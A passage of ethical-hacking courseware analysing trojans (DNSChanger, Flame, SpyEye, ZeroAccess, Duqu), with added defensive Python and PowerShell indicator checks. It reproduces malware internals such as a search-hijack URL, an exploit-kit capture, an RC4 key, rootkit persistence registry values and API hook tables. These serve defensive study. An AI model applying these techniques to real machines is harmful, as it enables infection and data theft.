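An indicator check for the artifacts listed above, added as an example (not the page's code and not Symantec's): it reports which of the Crisis paths exist under a given home directory and system root, and it parses LaunchAgent plists the way a responder would, flagging any agent whose program lives outside the standard system locations. The home directory, the benign agent and the executable path inside jl3V7we.app are constructed for the demo (the page names the .app but not its contents), and the trusted-prefix allow-list is an assumption.

```python
"""Added example, not from the page or from Symantec: an indicator check for
the OSX.Crisis artifacts listed above. The home directory, the benign agent
and the executable inside jl3V7we.app are constructed (the page names the
.app but not its contents)."""
import os
import plistlib
import tempfile

# Paths from the page; $HOME and the system root are parameters.
CRISIS_PATHS = [
    "{sys}/System/Library/Frameworks/Foundation.framework/XPCServices/"
    "com.apple.mdworker_server.xpc/Contents/MacOS/com.apple.mdworker_server",
    "{home}/Library/LaunchAgents/com.apple.mdworker.plist",
    "{home}/Library/Preferences/jl3V7we.app",
    "{home}/Library/ScriptingAdditions/appleHID/Contents/Info.plist",
    "{home}/Library/ScriptingAdditions/appleHID/Contents/MacOS/lUnsA3Ci.Bz7",
    "{home}/Library/ScriptingAdditions/appleHID/Contents/Resources/appleOsax.r",
]
# Where a LaunchAgent's program legitimately lives (assumed allow-list).
TRUSTED_PREFIXES = ("/System/", "/usr/", "/Applications/", "/Library/Apple/")


def present_indicators(home, sys_root="/"):
    """Return the Crisis paths that exist (symlinks count) for this user."""
    candidates = (p.format(home=home, sys=sys_root.rstrip("/")) for p in CRISIS_PATHS)
    return [p for p in candidates if os.path.lexists(p)]


def suspicious_launch_agents(home):
    """Parse each LaunchAgent plist under home and return (plist, program)
    for agents whose program is outside the trusted prefixes. An Apple-looking
    label such as com.apple.mdworker proves nothing; the program path does."""
    agents_dir = os.path.join(home, "Library", "LaunchAgents")
    findings = []
    if not os.path.isdir(agents_dir):
        return findings
    for name in sorted(os.listdir(agents_dir)):
        if not name.endswith(".plist"):
            continue
        try:
            with open(os.path.join(agents_dir, name), "rb") as f:
                plist = plistlib.load(f)
        except Exception:                       # malformed plist: report, don't skip
            findings.append((name, "<unparseable>"))
            continue
        program = plist.get("Program") or (plist.get("ProgramArguments") or [""])[0]
        if not program.startswith(TRUSTED_PREFIXES):
            findings.append((name, program))
    return findings


def demo():
    """Constructed home: a Crisis-style agent pointing into the hidden .app in
    ~/Library/Preferences plus a benign Apple agent for contrast. Returns
    (present indicator paths, suspicious agents)."""
    with tempfile.TemporaryDirectory() as root:
        home = os.path.join(root, "Users", "victim")
        agents = os.path.join(home, "Library", "LaunchAgents")
        app = os.path.join(home, "Library", "Preferences", "jl3V7we.app")
        os.makedirs(agents)
        os.makedirs(app)
        payload = os.path.join(app, "Contents", "MacOS", "jl3V7we")  # assumed layout
        with open(os.path.join(agents, "com.apple.mdworker.plist"), "wb") as f:
            plistlib.dump({"Label": "com.apple.mdworker", "RunAtLoad": True,
                           "ProgramArguments": [payload]}, f)
        with open(os.path.join(agents, "com.apple.benign.plist"), "wb") as f:
            plistlib.dump({"Label": "com.apple.benign",
                           "Program": "/System/Library/CoreServices/benign"}, f)
        return present_indicators(home, root), suspicious_launch_agents(home)
```

On a live machine, run `present_indicators` with the real home directory and `sys_root="/"`; the LaunchAgent check is the more durable of the two, because the file names change between builds while a user-level agent that starts a program from `~/Library/Preferences` does not.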
MAC OS X Trojan: DNSChanger
- This Trojan uses social engineering techniques to make users download the program and run malicious code
The malware modifies the DNS settings of the active network. Users are lured into downloading codecs or other movie downloads through QuickTime, etc. Once the download is finished, the Trojan is installed, and the results are slow access to the Internet, unwanted ads popping up on the computer screen, etc. This Trojan uses social engineering techniques to make users download the program and run the malicious code.
FIGURE 6.37: Attacker injecting MAC OS X Trojan in victim's system through downloads and prompt
MAC OS X Trojan: DNSChanger (Cont'd)
After the user downloads the false codec, the process of tricking the user and retrieving the user's information continues as follows:
- DNS settings: The local machine's DNS settings are changed to the attacker's IP address
- Playing a video: After the fake codec is installed, a video is played so as not to raise suspicion
- HTTP message: A notification about the victim's machine is sent to the attacker using an HTTP POST message
- Complete control: Hackers take complete control of the victim's MAC OS X computer
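Two resolver-tampering checks, added as an example that is not from the page: one for the DNSChanger behaviour above (DNS settings pointed at the attacker's IP) and one for the hosts-file modification listed under ZeuS earlier on the page. Both functions take file contents as strings, and the resolv.conf and hosts samples are constructed, so nothing on the live system is read.

```python
"""Added example (not from the page): resolver-tampering checks for the
DNSChanger (rogue nameserver) and ZeuS (hosts file) behaviour described on
the page. The resolv.conf and hosts contents below are constructed samples."""
import ipaddress

# Constructed sample: a corporate resolver plus one the attacker added.
SAMPLE_RESOLV = """# Generated by NetworkManager
search corp.example
nameserver 10.0.0.53
nameserver 198.51.100.7   # not ours
"""

# Constructed sample: two banking hostnames pinned to an attacker address.
SAMPLE_HOSTS = """127.0.0.1 localhost
::1 localhost
203.0.113.9 www.bank.example online.bank.example
10.0.0.20 intranet.corp.example
"""


def rogue_nameservers(resolv_conf: str, allowed):
    """Return nameserver entries in resolv.conf-style text that fall outside
    the allowed networks (the site's own resolvers, loopback stub resolvers).
    Unparseable addresses are reported too rather than silently skipped."""
    allowed_nets = [ipaddress.ip_network(a, strict=False) for a in allowed]
    rogue = []
    for line in resolv_conf.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) != 2 or parts[0] != "nameserver":
            continue
        try:
            ip = ipaddress.ip_address(parts[1])
        except ValueError:
            rogue.append(parts[1])
            continue
        if not any(ip in net for net in allowed_nets):
            rogue.append(parts[1])
    return rogue


def hijacked_hosts_entries(hosts_text: str, watched_domains):
    """Return (hostname, ip) pairs that pin a watched domain or any of its
    subdomains in a hosts file. A bank's hostname has no business being
    resolved locally at all, so any hit is a finding."""
    watched = tuple(d.lower().strip(".") for d in watched_domains)
    hits = []
    for line in hosts_text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) < 2:
            continue
        ip, names = parts[0], parts[1:]
        for name in names:
            n = name.lower()
            if any(n == d or n.endswith("." + d) for d in watched):
                hits.append((name, ip))
    return hits


def demo():
    """Run both checks over the constructed samples."""
    return (rogue_nameservers(SAMPLE_RESOLV, ["10.0.0.0/8", "127.0.0.1"]),
            hijacked_hosts_entries(SAMPLE_HOSTS, ["bank.example"]))
```

On macOS, the file `/etc/resolv.conf` is generated from the network service settings, so the authoritative list comes from `networksetup -getdnsservers <service>` or `scutil --dns`; the same nameserver check applies to the addresses those commands print. The hosts file check is the one to run on the ZeuS-style Windows infection, against `%SystemRoot%\system32\drivers\etc\hosts`.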
Mac OS X Trojan: Hell Raiser
- Hell Raiser allows an attacker to gain access to the victim system and send pictures, pop up chat messages, transfer files to and from the victim's system, completely monitor the victim's operations, etc.
[Screenshot: Hell Raiser client with a chat interface, the victim's parameters and a DISCONNECT button]
Note: The complete coverage of MAC OS X hacking is presented in a separate module
Mac OS X Trojan: Hell Raiser
Hell Raiser is malware that gets onto the victim's system when the user clicks what appears to be an innocent file. Once access to the victim's system has been gained, the attacker can send pictures, pop up chat messages, transfer files to and from the victim's computer, and even turn the system on and off from a remote location. Finally, the victim's operations can be completely monitored.
Trojan Analysis: Flame
- Flame, also known as Flamer, sKyWIper, or Skywiper, is modular computer malware discovered in 2012 that attacks computers running the Microsoft Windows operating system
- The malware is used for targeted cyber espionage in Middle Eastern countries
- Flame can spread to other systems over a local network (LAN) or via USB stick
- It can record audio, screenshots, keyboard activity, and network traffic
- The program also records Skype conversations and can turn infected computers into Bluetooth beacons which attempt to download contact information from nearby Bluetooth-enabled devices
Trojan Analysis: Flame
Source: http://www.kaspersky.com
Flame, also known as Flamer, sKyWIper or Skywiper, is modular computer malware that attacks computers running the Microsoft Windows operating system. This malware is used for targeted cyber espionage. It can spread to other systems over a local network (LAN) or via USB stick. It can record audio, screenshots, keyboard activity, and network traffic. It also records Skype conversations and can turn infected computers into Bluetooth beacons that attempt to download contact information from nearby Bluetooth-enabled devices. The following diagram depicts how an attacker succeeds in installing Flame on a victim's system.
[Diagram: the attacker sets up a command and control center and a malware server; the victim is redirected to the malicious server and downloads the malware; the command and control center provides instructions to get data; the infected machine infects other hardware in the LAN; the infected hardware sends data to the attacker.]
In order to inject a Trojan onto the victim's system and gain sensitive information, attackers first set up a command and control center and a malware server. Next, the attacker sends a phishing email to the victim and lures him or her into opening the link. Once the victim opens the link, he or she is redirected to the malicious server. As a result, the malware is downloaded onto the victim's system and the system is infected. This infected machine then infects the other hardware connected to the LAN. Commands from the command and control center are sent to, and responses received from, the infected hardware on the LAN. According to the received commands, the infected hardware on the LAN sends the data to the command and control center.
Trojan Analysis: Flame (Cont'd)
- The Flame C&C infrastructure, which had been operating for years, went offline immediately after Kaspersky Lab disclosed the discovery of the malware's existence last week
- Currently there are more than 80 known domains used by Flame for C&C servers and its related domains, which have been registered between 2008 and 2012
- During the past 4 years, servers hosting the Flame C&C infrastructure moved between multiple locations, including Hong Kong, Turkey, Germany, Poland, Malaysia, Latvia, the United Kingdom, and Switzerland
- The Flame C&C domains were registered with a list of fake identities and with a variety of registrars, going back as far as 2008
- According to Kaspersky Lab's sinkhole, infected users were registered in multiple regions including the Middle East, Europe, North America, and Asia-Pacific
- The Flame attackers seem to have a high interest in PDF, Office, and AutoCad drawings
- The data uploaded to the Flame C&C is encrypted using relatively simple algorithms; stolen documents are compressed using open source Zlib and modified PPDM compression
- Windows 7 64 bit, which we previously recommended as a good solution against infections with other malware, seems to be effective against Flame
Source: http://www.kaspersky.com
Trojan Analysis: Flame (Cont'd)
Source: http://www.kaspersky.com
Kaspersky Lab summarizes the results of its analysis of Flame as follows:
- The Flame C&C infrastructure, which had been operating for years, went offline immediately after Kaspersky Lab disclosed the discovery of the malware's existence.
- Currently there are more than 80 known domains used by Flame for C&C servers and its related domains, which have been registered between 2008 and 2012.
- During the past four years, servers hosting the Flame C&C infrastructure moved between multiple locations, including Hong Kong, Turkey, Germany, Poland, Malaysia, Latvia, the United Kingdom, and Switzerland.
- The Flame C&C domains were registered with an impressive list of fake identities and with a variety of registrars, going back as far as 2008.
- According to Kaspersky Lab's sinkhole, infected users were registered in multiple regions including the Middle East, Europe, North America, and Asia-Pacific.
- The Flame attackers seem to have a high interest in PDFs, Office, and AutoCad drawings.
- The data uploaded to the Flame C&C is encrypted using relatively simple algorithms. Stolen documents are compressed using open source Zlib and modified PPDM compression.
Module 06 Page 924
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved, Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Trojans and Backdoors
Exam 312-5 312-50 0 Certified Ethical Hacker
Windows 7 64 bit, which we previously recommended as a good solution against infections with other malware, seems to be effective against Flame.
[Figures: Contents of the /var/www/htdocs/newsforyou/ directory; Control panel interface (http://www.kaspersky.com)]
Flame C&C Server Analysis
Source: http://www.kaspersky.com

Flame's C&C server was running on 64-bit Debian 6.0.x OS under OpenVZ and using the PHP, Python, and bash programming languages with a MySQL database on an Apache 2.x web server with self-signed certificates. This server configuration was a typical LAMP (Linux, Apache, MySQL, PHP) setup. It was used to host a web-based control panel as well as to run some scheduled, fully automated scripts in the background. It was accessible over the HTTPS protocol, ports 443 and 8080. The document root directory was /var/www/htdocs/, which has sub-directories and PHP scripts. While the systems had PHP5 installed, the code was made to run on PHP4 as well. For example, /var/www/htdocs/newsforyou/Utils.php has a "str_split" function defined that implements the "str_split" function logic from PHP5, which was not available in PHP4. The developers of the C&C code most likely implemented compatibility with PHP4 because they were not sure which one of the two major PHP versions would be installed on the C&Cs.
Flame C&C Server Analysis (Cont’d)
Source: http://www.kaspersky.com

The C&C can understand several communication protocols including OldProtocol, OldProtocolE, SignupProtocol, and RedProtocol to talk to different clients codenamed SP, SPE, FL, and IP. A typical client session handled by the C&C started from recognition of the protocol version, then logging of connection information, followed by decoding the client request and saving it to the local file storage in encrypted form. All metadata about files received from the client was kept in a MySQL database. The C&C script encrypts all files received from the client. The C&C uses a PGP-like mechanism to encrypt files. First, the file data is encrypted using the Blowfish algorithm in CBC mode (with a static IV). The Blowfish key is generated randomly for each file. After file encryption, the Blowfish key is encrypted with a public key using the asymmetric encryption algorithm from the openssl_public_encrypt PHP function.
[Figure: the command and control server talks to clients SP, SPE, FL (Flame) and IP over the Internet (HTTP, HTTPS) using OldProtocol, OldProtocolE and SignupProtocol; RedProtocol is marked "not yet implemented"]
FIGURE 6.39: Clients and protocol relations found in this Flame C&C
Trojan Analysis: SpyEye
Source: http://techblog.avira.com

The Trojan makes use of user mode rootkit techniques to hide both its registry key located inside HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and the folder containing the Trojan executable and the configuration file config.bin. The folder is usually located in the root directory of the drive where the operating system is located. SpyEye is able to inject code in running processes and can perform the following functions:

- Capture network traffic
- Send and receive network packets in order to bypass application firewalls
- Hide and prevent access to the startup registry entry
- Hide and prevent access to the binary code
- Hide its own process within the injected processes
- Steal information from Internet Explorer and Mozilla Firefox
The following API functions are hooked by the Trojan within the winlogon.exe virtual address space:

Process                                Hooked function                       Address   Patch
C:\WINDOWS\System32\alg.exe[468]       WININET.dll!InternetReadFileExA       771F7E9A  8 Bytes JMP 0BAEB2E6
C:\WINDOWS\System32\alg.exe[468]       WININET.dll!HttpSendRequestW          77211808  8 Bytes JMP 0BAEE296
C:\WINDOWS\system32\winlogon.exe[640]  ntdll.dll!NtEnumerateValueKey         7C90D97C  8 Bytes JMP 0BAD769B
C:\WINDOWS\system32\winlogon.exe[640]  ntdll.dll!NtQueryDirectoryFile        7C90DF5E  8 Bytes JMP 0BAE2DC2
C:\WINDOWS\system32\winlogon.exe[640]  ntdll.dll!NtResumeThread              7C90E45F  8 Bytes JMP 0BAF1507
C:\WINDOWS\system32\winlogon.exe[640]  ntdll.dll!NtSetInformationFile        7C90E5D9  8 Bytes JMP 0BAD73E5
C:\WINDOWS\system32\winlogon.exe[640]  ntdll.dll!NtVdmControl                7C90E975  8 Bytes JMP 0BAE2E78
C:\WINDOWS\system32\winlogon.exe[640]  kernel32.dll!FlushInstructionCache    7C839277  8 Bytes JMP 0BAD7831
C:\WINDOWS\system32\winlogon.exe[640]  ADVAPI32.dll!CryptEncrypt             77DF1558  8 Bytes JMP 0BAEA0E1
C:\WINDOWS\system32\winlogon.exe[640]  CRYPT32.dll!PFXImportCertStore        77AEF748  8 Bytes JMP 0BADE8QA
C:\WINDOWS\system32\winlogon.exe[640]  USER32.dll!TranslateMessage           77D48BCE  8 Bytes JMP 0BAD930C
C:\WINDOWS\system32\winlogon.exe[640]  WS2_32.dll!send                       71AB428A  8 Bytes JMP 0BAEA9B5
C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!InternetQueryOptionA      771B81A7  8 Bytes JMP 0BAE7B9D
C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!HttpOpenRequestA          771C4AC5  8 Bytes JMP 0BAE7A88
C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!HttpAddRequestHe...       771C54CA  8 Bytes JMP 0BADA638
C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!InternetCloseHandle       771C61DC  8 Bytes JMP 0BAE8415
C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!HttpSendRequestA          771C76B8  5 Bytes [EB, 01, C3, E9, 7...
C:\WINDOWS\system32\winlogon.exe[640]  WININET.dll!HttpSendRequestA          771C76BE  2 Bytes [92, 94] {XCHG E...

FIGURE 6.40: API functions hooked by the Trojan within the winlogon.exe virtual address space
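One way to triage a hook report like Figure 6.40, as an added example that is not part of the Avira write-up: parse each hooked export, decode the detour, and flag detours that land in memory no loaded module backs (the mark of injected code). The report lines and the module load ranges below are constructed for illustration, not taken from the figure.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample in the GMER-style format of Figure 6.40 (illustrative
# lines with made-up values, not a verbatim copy of the figure).
SAMPLE_REPORT = r"""
.text  C:\WINDOWS\System32\alg.exe[468] WININET.dll!InternetReadFileExA  771F7E9A 8 Bytes  JMP 0BAEB2E6
.text  C:\WINDOWS\System32\alg.exe[468] WININET.dll!HttpSendRequestW  77211808 8 Bytes  JMP 0BAEE296
.text  C:\WINDOWS\system32\winlogon.exe[640] ntdll.dll!NtEnumerateValueKey  7C90D97C 8 Bytes  JMP 0BAD769B
.text  C:\WINDOWS\system32\winlogon.exe[640] ntdll.dll!NtQueryDirectoryFile  7C90DF5E 8 Bytes  JMP 0BAE2DC2
.text  C:\WINDOWS\system32\winlogon.exe[640] kernel32.dll!FlushInstructionCache  7C839277 8 Bytes  JMP 0BAD7831
.text  C:\WINDOWS\system32\winlogon.exe[640] WS2_32.dll!send  71AB428A 8 Bytes  JMP 0BAEA9B5
.text  C:\WINDOWS\system32\winlogon.exe[640] USER32.dll!TranslateMessage  77D48BCE 8 Bytes  JMP 7C8012AB
.text  C:\WINDOWS\system32\winlogon.exe[640] WININET.dll!HttpSendRequestA  771C76B8 5 Bytes  [EB, 01, C3, E9, 7C]
"""

# Constructed load ranges, the kind a loaded-module listing of the process
# gives you. A detour target that falls outside every range points at memory
# that no image backs, which is what injected code looks like.
MODULE_RANGES = {
    "ntdll.dll": (0x7C900000, 0x7C9AF000),
    "kernel32.dll": (0x7C800000, 0x7C8F6000),
    "WS2_32.dll": (0x71AB0000, 0x71AC7000),
    "WININET.dll": (0x771B0000, 0x77256000),
    "USER32.dll": (0x77D40000, 0x77DD0000),
}

HOOK_RE = re.compile(
    r"^\.text\s+(?P<image>\S.*?)\[(?P<pid>\d+)\]\s+"
    r"(?P<module>[\w.]+)!(?P<func>[\w.]+)\s+"
    r"(?P<addr>[0-9A-Fa-f]{8})\s+(?P<nbytes>\d+)\s+Bytes\s+(?P<patch>.+?)\s*$"
)


@dataclass(frozen=True)
class Hook:
    image: str
    pid: int
    module: str
    func: str
    addr: int
    nbytes: int
    patch: str

    @property
    def jmp_target(self) -> Optional[int]:
        """Absolute detour target if the patch is a plain JMP, else None."""
        m = re.fullmatch(r"JMP\s+([0-9A-Fa-f]{8})", self.patch)
        return int(m.group(1), 16) if m else None


def parse_hooks(report: str) -> List[Hook]:
    """Turn report lines into Hook records; unrelated lines are skipped."""
    hooks: List[Hook] = []
    for line in report.strip().splitlines():
        m = HOOK_RE.match(line)
        if not m:
            continue
        hooks.append(Hook(m["image"], int(m["pid"]), m["module"], m["func"],
                          int(m["addr"], 16), int(m["nbytes"]), m["patch"]))
    return hooks


def module_for(addr: int, ranges: Dict[str, Tuple[int, int]]) -> Optional[str]:
    """Name of the loaded module whose range contains addr, or None."""
    for name, (lo, hi) in ranges.items():
        if lo <= addr < hi:
            return name
    return None


def classify(hook: Hook, ranges: Dict[str, Tuple[int, int]]) -> str:
    target = hook.jmp_target
    if target is None:
        return "inline-patch"            # raw byte patch, no decodable JMP
    owner = module_for(target, ranges)
    if owner is None:
        return "jmp-to-unbacked-memory"  # detour into injected code
    return f"jmp-to-{owner}"             # detour into another loaded image


def triage(report: str, ranges=MODULE_RANGES) -> Dict[str, List[Tuple[str, str]]]:
    """Group verdicts per process ("image[pid]") for an analyst to review."""
    findings: Dict[str, List[Tuple[str, str]]] = {}
    for h in parse_hooks(report):
        proc = f"{h.image.rsplit(chr(92), 1)[-1]}[{h.pid}]"
        findings.setdefault(proc, []).append((f"{h.module}!{h.func}", classify(h, ranges)))
    return findings


if __name__ == "__main__":
    for proc, verdicts in triage(SAMPLE_REPORT).items():
        for export, verdict in verdicts:
            print(f"{proc:22} {export:40} {verdict}")
```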
Trojan Analysis: SpyEye (Cont’d)
Source: http://techblog.avira.com

After execution, the Trojan connects to a server and sends some information about the system to the server such as:

- MD5 of the executed sample
- Operating system version
- Computer name
- Internet Explorer version
- User name
- Version number of the malware

[Figure: process and network connection listing in which winlogon.exe (PID 660) holds a TCP connection to reverse-mtl-76-76-98-82.gogax.com on port https in SYN_SENT state, alongside svchost.exe and System NetBIOS listeners]

FIGURE 6.41: Malware injected piece of code within winlogon.exe virtual address space
Malware is packed with UPX and a polymorphic decryptor. In the code snippet that follows, you can see a call to another routine after the end of the usual UPX decryption: call sub_42F851.

    push    eax
    push    <illegible immediate>h
    push    4969h
    push    3367h
    push    5047h
    lea     ecx, [ebp-1Ch]
    push    ecx
    push    dword ptr [ebp-0Ch]
    push    dword ptr [ebp-10h]
    call    sub_42F851
    leave
    retn

FIGURE 6.42: Malware is packed with UPX and a polymorphic decryptor
Trojan Analysis: ZeroAccess
Source: http://www.symantec.com

ZeroAccess, also known as "Smiscer" or "Max++ rootkit," is a malicious Windows threat used to generate revenue primarily through pay-per-click fraud. ZeroAccess uses low-level rootkit functionality to remain persistent and stealthy. It arrives through various vectors, including web exploit kits and social engineering attacks. Although ZeroAccess contains generic backdoor functionality that could be used for multiple purposes, it has been observed downloading fake security software, performing click fraud, and performing search engine poisoning.

Click fraud scheme

Upon infection, ZeroAccess will install additional payload modules, downloaded through its back door. Generally, this is an executable that performs click fraud. This click fraud scheme has been observed to utilize more than one pay-per-click affiliate network. Advertisers sign up with ad networks that in turn contract website owners who are willing to display advertisements on their websites in exchange for a small commission. The ad networks charge the advertisers for distributing and displaying their ads and pay the website owners a small commission each time a visitor views (pay-per-view) or clicks (pay-per-click) on the ads.
[Figure: advertisement for the Clickice pay-per-click network (clickice.com) addressed to webmasters, promising generous bids, an advanced feed version, an administrative interface with traffic-processing utilities, GMT-based statistics, PHP/public/image/JavaScript/XML feeds, keyword databases, and support via ICQ, Live Chat, e-mail or ticket system]
FIGURE 6.43: Example advertisement for the Clicklce pay-per-click network
Trojan Analysis: ZeroAccess (Cont’d)
Source: http://www.symantec.com

In addition to generating revenue through pay-per-click networks, ZeroAccess hijacks users' searches. When an infected user searches in popular search engines (including google.com, bing.com, icq.com, yahoo.com, ask.com, and aol.com), ZeroAccess sends an additional GET request similar to the following:

    http://suzukimxml[.]cn/r/redirect.php?id=9de5404ac67a404a0e1a775f212cd210&u=198&cv=150&sv=15&os=501.804.x86

This causes an additional pop-up window or tab to be created. The new window or tab will contain search results for the original search query with hijacked links or additional content. An example of returned HTML can be seen as follows.
    function FormatRedirect(ref, title) {
        body = "<html><head><title>" + title + "</title></head><frameset [...]></html>";
        AddPage("www.google.com.hk/search?q=car&hl=zh-CN&source=hp&gbv=1", 2, null, 0, "HTTP/1.1 200\r\nConnection: close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Length: " + body.length + "\r\n\r\n" + body);
    }
    FormatRedirect("kozanekozasearchsystem.com/?search=car&subid=198&key=415db60c8aa81c0bed68", "car");

FIGURE 6.44: An example of returned HTML
Trojan Analysis: ZeroAccess (Cont’d)
Source: http://www.symantec.com

ZeroAccess can also be installed through web exploit kits. The user is often falsely given the impression they will be installing an update for an application, such as Adobe Flash Player. This use of various exploit kits to install ZeroAccess is likely simply a byproduct of its authors attempting to evade IPS rather than an indication of ZeroAccess being sold to other distributors.
[Figure: packet capture of the exploit kit infection chain, annotated in three stages. Main Attack URL: GET /0snp91icm/?4 HTTP/1.1 to Host: lowmustard.org with a Firefox/2.0.0.13 User-Agent. Second Stage Exploits: HTTP/1.1 200 OK response dated Tue, 25 Oct 2011 from Server: Apache/2.2.17 (Unix) PHP/5.2.17 carrying obfuscated JavaScript. ZeroAccess Download: HTTP/1.1 200 OK response with Content-Length: 243712, Content-Disposition: inline, Content-Type: application/octet-stream and X-Pad: avoid browser bug, delivering the ZeroAccess binary]

FIGURE 6.45: Exploit kit dropping ZeroAccess
Trojan Analysis: ZeroAccess (Cont’d)
Source: http://www.symantec.com

Upon execution, ZeroAccess selects a random driver alphabetically between %System%\Drivers\classpnp.sys and %System%\win32k.sys and overwrites the driver with its own code. The original clean driver is stored in a hidden encrypted NTFS volume using the file name %System%\config\[EIGHT RANDOM CHARACTERS]. The hidden volume is used to store the original clean driver as well as additional components and downloaded payload modules. The volume is roughly 16 MB in size and is accessed through the file system device name:

    \\??\ACPI#PNP0303#2&da1a3ff&0

For example, the original clean driver is stored at:

    \\??\ACPI#PNP0303#2&da1a3ff&0\L\[EIGHT RANDOM CHARACTERS]

The file system of the hidden volume is encrypted using RC4 with the following 128-bit key:

    \xFF\x7C\xF1\x64\x12\xE2\x2D\x4D\xB1\xCF\x0F\x5D\x6F\xE5\xA0\x49

The Trojan then creates the following registry entries to ensure the newly infected driver serves as the main load point for ZeroAccess:
Module 06 Page 940
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[FILE NAME OF INFECTED DRIVER]\"ImagePath" = "\*"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[FILE NAME OF INFECTED DRIVER]\"Type" = "1"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[FILE NAME OF INFECTED DRIVER]\"Start" = "3"
Code is then injected into services.exe through an APC. The injected code encrypts the data stored in the hidden NTFS volume under \??\ACPI#PNP0303#2&da1a3ff&0\U and also creates an alternate data stream file %SystemDrive%\2385299062:2302268273.exe and executes it. These main loader components ensure the additional payload files stored in the hidden NTFS volume are loaded and executed.
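The three loader artifacts described above (the rewritten driver service values, the overwritten driver in the classpnp.sys..win32k.sys window, and the alternate data stream on the system drive) are all visible from user mode and can be checked on a live host. The following PowerShell script is an added example written for this page; it is not Symantec's or EC-Council's code. It assumes Windows 7 or later with PowerShell 3.0+ and an elevated prompt. An unsigned third-party driver will also be reported by the signature check, so treat each line as a lead to verify, not a verdict. The hidden volume itself is only reachable through the rootkit's own device object and is not inspected here.

```powershell
# Added example (not from the Symantec write-up or the CEH text): check a live
# Windows host for the ZeroAccess loader indicators described above.
# Assumes PowerShell 3.0+ and an elevated prompt.

$sys = Join-Path $env:SystemRoot 'System32'
$findings = New-Object System.Collections.Generic.List[string]

# 1. Driver services whose ImagePath was rewritten to "\*" with Type=1
#    (kernel driver) and Start=3 (demand start): the three values the
#    text lists as the Trojan's load point.
Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
  ForEach-Object {
    $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
    if ($p.ImagePath -eq '\*' -and $p.Type -eq 1 -and $p.Start -eq 3) {
      $findings.Add("Service $($_.PSChildName): ImagePath='\*', Type=1, Start=3 (ZeroAccess load-point pattern)")
    }
  }

# 2. Drivers in the alphabetic window the Trojan picks from,
#    %System%\Drivers\classpnp.sys .. %System%\win32k.sys. An overwritten
#    Microsoft driver no longer has a valid Authenticode signature. A
#    third-party driver that was never signed shows up here too, so verify
#    each hit rather than treating it as a verdict.
$candidates = @(Get-ChildItem (Join-Path $sys 'drivers') -Filter '*.sys' |
  Where-Object { $_.Name -ge 'classpnp.sys' -and $_.Name -le 'win32k.sys' })
$win32k = Join-Path $sys 'win32k.sys'
if (Test-Path $win32k) { $candidates += Get-Item $win32k }
foreach ($f in $candidates) {
  $sig = Get-AuthenticodeSignature -FilePath $f.FullName
  if ($sig.Status -ne 'Valid') {
    $findings.Add("Driver $($f.FullName): signature status $($sig.Status)")
  }
}

# 3. Alternate data streams on files in the root of the system drive. The
#    text says the loader drops and runs %SystemDrive%\2385299062:2302268273.exe,
#    i.e. a stream named 2302268273.exe attached to a file named 2385299062.
#    Zone.Identifier streams are normal download markers and are skipped.
Get-ChildItem -Path "$env:SystemDrive\" -File -Force -ErrorAction SilentlyContinue |
  ForEach-Object {
    Get-Item -Path $_.FullName -Stream * -ErrorAction SilentlyContinue |
      Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -ne 'Zone.Identifier' } |
      ForEach-Object {
        $findings.Add("ADS $($_.FileName):$($_.Stream) ($($_.Length) bytes)")
      }
  }

if ($findings.Count) { $findings } else { 'No ZeroAccess loader indicators found' }
```

Run it from an elevated prompt. The service check is the most specific of the three: a legitimate driver service has an ImagePath pointing at a .sys file, never "\*". Any hit on that check justifies pulling the named driver file for analysis and comparing it with a known-good copy from installation media.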
Trojan Analysis: Duqu

Duqu is a sophisticated Trojan that acts as a backdoor and facilitates the theft of private information.

The code section of the Payload DLL is common for a binary that consists of "slices" of code that may have been initially compiled in separate object files before they were linked in a single DLL. Most of them can be found in any C++ program, like the Standard Template Library (STL) functions, run-time library functions, and user-written code, except the biggest slice that contains most of the C&C interaction code.

(screenshot: code section of the Duqu payload DLL by start address, reproduced as Figure 6.46)

http://www.securelist.com
Trojan Analysis: Duqu

Source: http://www.securelist.com

Duqu is a sophisticated Trojan that acts as a backdoor and facilitates the theft of private information. The code section of the Payload DLL is common for a binary that was made from several pieces of code. It consists of "slices" of code that may have been initially compiled in separate object files before they were linked in a single DLL. Most of them can be found in any C++ program, like the Standard Template Library (STL) functions, run-time library functions, and user-written code, except the biggest slice that contains most of the C&C interaction code.
FIGURE 6.46: Duqu Tool Screenshot. Code section of the Duqu payload DLL, by start address:
.10001000  C++ Standard Template Library functions
.10004250  Native C++ code with STL
.1000C2C9  Payload: other language / C framework, no C++
.10023878  Native C++ code with STL
.10028F2C  Run-time library code
.1002EAD1  Native C code for injection, API thunks, exception handlers
The last slice ends at .100300A4.
Trojan Analysis: Duqu Framework

Duqu Framework Code Properties
- Everything is wrapped into objects
- Function table is placed directly into the class instance and can be modified after construction
- There is no distinction between utility classes (linked lists, hashes) and user-written code
- Objects communicate using method calls, deferred execution queues, and event-driven callbacks
- There are no references to run-time library functions; native Windows API is used instead

Event Driven Framework
- Event objects, based on native Windows API handles
- Thread context objects that hold lists of events and deferred execution queues
- Callback objects that are linked to events
- Event monitors, created by each thread context for monitoring events and executing callback objects
- Thread context storage manages the list of active threads and provides access to per-thread context objects

http://www.securelist.com
Trojan Analysis: Duqu Framework

Source: http://www.securelist.com

